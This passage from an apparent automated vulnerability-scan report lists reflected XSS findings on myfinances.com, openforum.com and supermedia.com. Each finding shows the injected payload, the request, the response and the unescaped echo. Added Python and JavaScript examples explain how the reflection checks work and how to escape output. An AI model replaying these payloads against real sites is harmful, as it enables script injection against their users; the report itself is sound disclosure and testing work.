Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<input type="hidden" name="back" value="/budget.php?91d41"><script>alert(1)</script>3d8e0c43e90=1" />
...[SNIP]...

1.496. http://www.myfinances.com/budget.php [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e9843'><script>alert(1)</script>2707c201b22 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /budget.php?query=savings+accountse9843'><script>alert(1)</script>2707c201b22&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:41 GMT
Content-Length: 19651
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/
Set-Cookie: PHPSESSID=8mri1qtefnba9k49k4ep3nl8h2; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<input type='text' id='keyword' name='keyword' title='savings accountse9843'><script>alert(1)</script>2707c201b22' value ='savings accountse9843'>
...[SNIP]...

1.497. http://www.myfinances.com/budget.php [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload a2ce6<script>alert(1)</script>826352099bb was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /budget.php?query=savings+accountsa2ce6<script>alert(1)</script>826352099bb&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:45 GMT
Content-Length: 19629
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.26CKOUQ; path=/
Set-Cookie: PHPSESSID=u15624i2oae1adjjrl0fa5mn65; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<h2>Results for &lsquo;savings accountsa2ce6<script>alert(1)</script>826352099bb&rsquo;</h2>
...[SNIP]...

1.498. http://www.myfinances.com/contact.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /contact.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 613cb'><script>alert(1)</script>8f2541e63ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.html?613cb'><script>alert(1)</script>8f2541e63ae=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:02:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:02:44 GMT
Content-Length: 8051
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<form class='form' enctype='multipart/form-data' action='/contact.html?613cb'><script>alert(1)</script>8f2541e63ae=1' method='post' >
...[SNIP]...
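The entries above all rest on the same test: a canary built as prefix + break-out + suffix is sent, and the response is searched for an echo in which the break-out characters survived. The context matters, because the character that has to survive differs: a closing double quote for 1.487 to 1.495, a single quote for 1.496 and 1.498, a bare `<` for the text context in 1.497, and, for the openforum.com entries further down, an unescaped quote inside a JavaScript string. The script below is an added example written for this report, not CloudScan's or Burp's code: it classifies where each echo landed and decides whether the needed character came back unencoded. The response fragments marked "copied" are taken from the snippets above; the enclosing `<script>` element around the openforum.com fragment and the two hardened fragments are constructed for this example.

```python
"""Reflection check for the findings above (1.487 to 1.498) and for the
script-string context shown by the openforum.com entries that follow.

Added example; this is not CloudScan's or Burp's code. It reproduces the test
the report describes: send a canary of prefix + break-out + suffix, find each
echo in the response, classify the context it landed in, and decide whether
the one character the break-out depends on came back unencoded. Fragments
marked "copied" are lifted from the report's snippets; the <script> wrapper
and the two hardened fragments are constructed for this example."""
import re
from dataclasses import dataclass
from typing import List, Optional

# The character each context needs unencoded: close the attribute, open a tag, end the JS string.
BREAKOUT_CHAR = {"attr_dq": '"', "attr_sq": "'", "text": "<", "js_sq": "'", "js_dq": '"'}


@dataclass
class Reflection:
    context: str       # attr_dq, attr_sq, tag, text, js_sq, js_dq or js_code
    echoed: str        # exactly what came back between the two canary markers
    exploitable: bool  # break-out character survived, neither entity-encoded nor backslash-escaped


def _open_quote(segment: str, honour_backslash: bool) -> Optional[str]:
    """Return the quote character still open at the end of segment, if any."""
    quote, i = None, 0
    while i < len(segment):
        c = segment[i]
        if honour_backslash and quote and c == "\\":
            i += 2                       # skip the escaped character
            continue
        if quote is None and c in "'\"":
            quote = c
        elif c == quote:
            quote = None
        i += 1
    return quote


def classify_context(body: str, pos: int) -> str:
    """Classify the syntactic context at offset pos from what precedes it."""
    before = body[:pos]
    lower = before.lower()
    script_at = lower.rfind("<script")
    if script_at > lower.rfind("</script"):              # inside an open <script> block
        js = before[script_at:]
        js = js[js.find(">") + 1:] if ">" in js else ""  # drop the <script ...> tag itself
        return {"'": "js_sq", '"': "js_dq", None: "js_code"}[_open_quote(js, True)]
    if before.rfind("<") > before.rfind(">"):            # inside an HTML tag
        tag = before[before.rfind("<"):]
        return {"'": "attr_sq", '"': "attr_dq", None: "tag"}[_open_quote(tag, False)]
    return "text"


def check_reflection(body: str, prefix: str, breakout: str, suffix: str) -> List[Reflection]:
    """Locate every echo of the canary and judge whether it is exploitable where it landed."""
    pattern = re.escape(prefix) + r"(.{0,200}?)" + re.escape(suffix)
    found = []
    for m in re.finditer(pattern, body, re.S):
        context = classify_context(body, m.start())
        echoed = m.group(1)
        needed = BREAKOUT_CHAR.get(context)
        survived = needed is not None and re.search(r"(?<!\\)" + re.escape(needed), echoed) is not None
        found.append(Reflection(context, echoed, survived and needed in breakout))
    return found


def verdict(body: str, prefix: str, breakout: str, suffix: str) -> str:
    refs = check_reflection(body, prefix, breakout, suffix)
    if not refs:
        return "not reflected"
    hits = [r.context for r in refs if r.exploitable]
    return f"exploitable ({', '.join(hits)})" if hits else "reflected but neutralised"


# Copied from responses 1.487, 1.496 and 1.497.
MYFINANCES_ATTR_DQ = (
    '<a target="_blank" href="http://twitter.com/home?status=Check out this '
    "'How to Estimate the Value of Your Home' on 'MyFinances.com'! "
    "'http://www.myfinances.com/blog/3227953.html?434d0\"><script>alert(1)</script>5608a968905=1'\">"
)
MYFINANCES_ATTR_SQ = (
    "<input type='text' id='keyword' name='keyword' title='savings accountse9843'>"
    "<script>alert(1)</script>2707c201b22' value ='savings accountse9843'>"
)
MYFINANCES_TEXT = "<h2>Results for &lsquo;savings accountsa2ce6<script>alert(1)</script>826352099bb&rsquo;</h2>"
# Copied from response 1.499; the enclosing <script> element is constructed.
OPENFORUM_JS = (
    '<script type="text/javascript">\n/*<![CDATA[*/\n'
    "AX.login_link = 'https://www99.americanexpress.com/myca/usermgt/us/action?"
    "TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3f54350'-alert(1)-'b64566be317%253d1';\n"
    "AX.logout_dest_url = 'https://www.openforum.com/?54350'-alert(1)-'b64566be317%3d1';\n"
    "/*]]>*/\n</script>"
)
# Constructed: the same two echoes with attribute encoding and JS string escaping applied.
HARDENED_ATTR = ('<input type="hidden" name="back" value="/budget.php?91d41&quot;&gt;&lt;script&gt;'
                 'alert(1)&lt;/script&gt;3d8e0c43e90=1" />')
HARDENED_JS = "<script>AX.logout_dest_url = 'https://www.openforum.com/?54350\\'-alert(1)-\\'b64566be317%3d1';</script>"
```

`verdict(MYFINANCES_ATTR_DQ, "434d0", '"><script>alert(1)</script>', "5608a968905")` reports `exploitable (attr_dq)`, while the same call on `HARDENED_ATTR` reports `reflected but neutralised`, which is the distinction the report's "Confidence: Certain" rests on. Run it against the body of the final response: for 1.496 and 1.497 the report notes that the echo only appears after a redirect, so fetch with redirects followed before handing the body to `check_reflection`.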

1.499. http://www.openforum.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.openforum.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54350'-alert(1)-'b64566be317 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?54350'-alert(1)-'b64566be317=1 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Thu, 03 Feb 2011 13:50:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2735450304.20480.0000; path=/
Content-Length: 102188


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...

       AX.login_link = 'https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3f54350'-alert(1)-'b64566be317%253d1';
       AX.logout_dest_url = 'https://www.openforum.com/?54350'-alert(1)-'b64566be317%3d1';
   /*]]>
...[SNIP]...

1.500. https://www.openforum.com/ [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4b2f'-alert(1)-'731207dc1c was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=inav_homea4b2f'-alert(1)-'731207dc1c&inav=menu_business_openforum HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2785781952.20480.0000; path=/
Content-Length: 102363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...
ink = 'https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%253dinav_homea4b2f'-alert(1)-'731207dc1c%2526inav%253dmenu_business_openforum';
       AX.logout_dest_url = 'https://www.openforum.com/?cid%3dinav_homea4b2f'-alert(1)-'731207dc1c%26inav%3dmenu_business_openforum';
   /*]]>
...[SNIP]...

1.501. https://www.openforum.com/ [inav parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The value of the inav request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1db04'-alert(1)-'749ae354a20 was submitted in the inav parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=inav_home&inav=menu_business_openforum1db04'-alert(1)-'749ae354a20 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2819336384.20480.0000; path=/
Content-Length: 102377


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...
com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%253dinav_home%2526inav%253dmenu_business_openforum1db04'-alert(1)-'749ae354a20';
       AX.logout_dest_url = 'https://www.openforum.com/?cid%3dinav_home%26inav%3dmenu_business_openforum1db04'-alert(1)-'749ae354a20';
   /*]]>
...[SNIP]...

1.502. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a374f'-alert(1)-'7289baab9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?a374f'-alert(1)-'7289baab9b9=1 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2836113600.20480.0000; path=/
Content-Length: 102556


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...

       AX.login_link = 'https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fa374f'-alert(1)-'7289baab9b9%253d1';
       AX.logout_dest_url = 'https://www.openforum.com/?a374f'-alert(1)-'7289baab9b9%3d1';
   /*]]>
...[SNIP]...

1.503. http://www.supermedia.com/business-listings [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aac2e"%3balert(1)//8d034beed23 was submitted in the campaignId parameter. This input was echoed as aac2e";alert(1)//8d034beed23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-listings?tsrc=SP&campaignId=SP_FT_AddEditaBusinessaac2e"%3balert(1)//8d034beed23 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:53 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>



...[SNIP]...
rop24="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="SP_FT_AddEditaBusinessaac2e";alert(1)//8d034beed23";
s.products="";
s.eVar1="";
s.eVar2="SP";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15
...[SNIP]...

1.504. http://www.supermedia.com/business-listings [tsrc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings

Issue detail

The value of the tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20b9c"%3balert(1)//623d3053168 was submitted in the tsrc parameter. This input was echoed as 20b9c";alert(1)//623d3053168 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-listings?tsrc=SP20b9c"%3balert(1)//623d3053168&campaignId=SP_FT_AddEditaBusiness HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:48 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>



...[SNIP]...
p27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="SP_FT_AddEditaBusiness";
s.products="";
s.eVar1="";
s.eVar2="SP20b9c";alert(1)//623d3053168";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15="";
s.eVar16="";
s.eVar17="";
s.eVar18="
...[SNIP]...
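
The following is an added example, not code from the report or from the scanned sites, showing the JavaScript string context that findings 1.500 to 1.504 above share: a script statement whose string literal is built from the query string, so a quote in the parameter ends the literal early. The payloads are the ones from findings 1.500 and 1.503; the statement shape, the variable name dest, the host www.example.test and the function names are placeholders. The hardened renderer escapes the value for a JavaScript string literal, and the structural check mirrors what the scanner infers when it reports "echoed unmodified".

```javascript
// Added example, not from the report or the scanned sites: the JavaScript
// string context behind findings 1.500 to 1.504. The statement shape follows
// the responses (an assignment whose literal is built from the query string);
// `dest`, www.example.test and the function names are placeholders.

// Vulnerable: the raw parameter value is concatenated into the literal.
function renderVulnerable(quote, param) {
  return `var dest = ${quote}https://www.example.test/?cid=${param}${quote};`;
}

// Hardened: escape the value for a JS string literal. JSON.stringify covers
// backslashes, double quotes and control characters; the extra replacements
// cover single quotes (JSON leaves them alone), "</script>" (which would end
// the <script> element before the JS parser ever runs) and U+2028/U+2029.
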